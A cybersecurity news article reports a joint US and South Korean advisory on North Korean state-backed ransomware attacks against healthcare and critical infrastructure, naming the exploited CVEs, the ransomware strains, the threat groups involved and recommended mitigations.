North Korean Hackers Targeting Healthcare with Ransomware to Fund its Operations

Feb 10, 2023Ravie LakshmananThreat Intelligence / Ransomware

State-backed hackers from North Korea are conducting ransomware
attacks against healthcare and critical infrastructure facilities
to fund illicit activities, U.S. and South Korean cybersecurity and
intelligence agencies warned in a joint advisory.

The attacks, which demand cryptocurrency ransoms in exchange for
recovering access to encrypted files, are designed to support North
Korea’s national-level priorities and objectives.

This includes “cyber operations targeting the United States and
South Korea governments — specific targets include Department of
Defense Information Networks and Defense Industrial Base member
networks,” the authorities said ^[1].

Threat actors with North Korea have been linked ^[2]
to espionage ^[3], financial theft ^[4], and cryptojacking
operations for years, including the infamous WannaCry ransomware attacks ^[5] of 2017 that infected
hundreds of thousands of machines located in over 150
countries.

Since then, North Korean nation-state crews have dabbled in
multiple ransomware strains such as VHD ^[6], Maui ^[7], and H0lyGh0st ^[8]
to generate a steady stream of illegal revenues for the
sanctions-hit regime.

Besides procuring its infrastructure through cryptocurrency
generated through its criminal activities, the adversary is known
to function under third-party foreign affiliate identities to
conceal their involvement.

Attack chains mounted by the hacking crew entail the
exploitation of known security flaws in Apache Log4j, SonicWall,
and TerraMaster NAS appliances (e.g., CVE 2021-44228 ^[9], CVE-2021-20038 ^[10], and CVE-2022-24990 ^[11]) to gain initial
access, following it up by reconnaissance, lateral movement, and
ransomware deployment.

In addition to using privately developed ransomware, the actors
have been observed leveraging off-the-shelf tools like BitLocker,
DeadBolt, ech0raix, Jigsaw, and YourRansom for encrypting files,
not to mention even impersonating other ransomware groups such as
REvil.

As mitigations, the agencies recommend organizations to
implement the principle of least privilege, disable unnecessary
network device management interfaces, enforce multi-layer network
segmentation, require phishing-resistant authentication controls,
and maintain periodic data backups.

The alert comes as a new report from the United Nations found
that North Korean hackers stole record-breaking virtual assets
estimated to be worth between $630 million and more than $1 billion
in 2022.

The report, seen by the Associated Press ^[12], said the threat actors
used increasingly sophisticated techniques to gain access to
digital networks involved in cyberfinance, and to steal information
from governments, companies, and individuals that could be useful
in North Korea’s nuclear and ballistic missile programs.

It further called out Kimsuky ^[13], Lazarus Group ^[14], and Andariel ^[15], which are all part of
the Reconnaissance General Bureau (RGB ^[16]), for continuing to
target victims with the goal of creating revenue and soliciting information ^[17] of value to the hermit
kingdom.

Found this article interesting? Follow us on Twitter ^[18] and LinkedIn ^[19] to read more exclusive
content we post.

References

^{^}
said
(www.cisa.gov)
^{^}
linked
(www.cisa.gov)
^{^}
espionage
(thehackernews.com)
^{^}
financial theft
(thehackernews.com)
^{^}
WannaCry
ransomware attacks (thehackernews.com)
^{^}
VHD
(thehackernews.com)
^{^}
Maui
(thehackernews.com)
^{^}
H0lyGh0st
(thehackernews.com)
^{^}
CVE
2021-44228 (nvd.nist.gov)
^{^}
CVE-2021-20038
(nvd.nist.gov)
^{^}
CVE-2022-24990
(nvd.nist.gov)
^{^}
seen
by the Associated Press (apnews.com)
^{^}
Kimsuky
(thehackernews.com)
^{^}
Lazarus Group
(thehackernews.com)
^{^}
Andariel
(thehackernews.com)
^{^}
RGB
(www.mandiant.com)
^{^}
soliciting information
(twitter.com)
^{^}
Twitter 
(twitter.com)
^{^}
LinkedIn
(www.linkedin.com)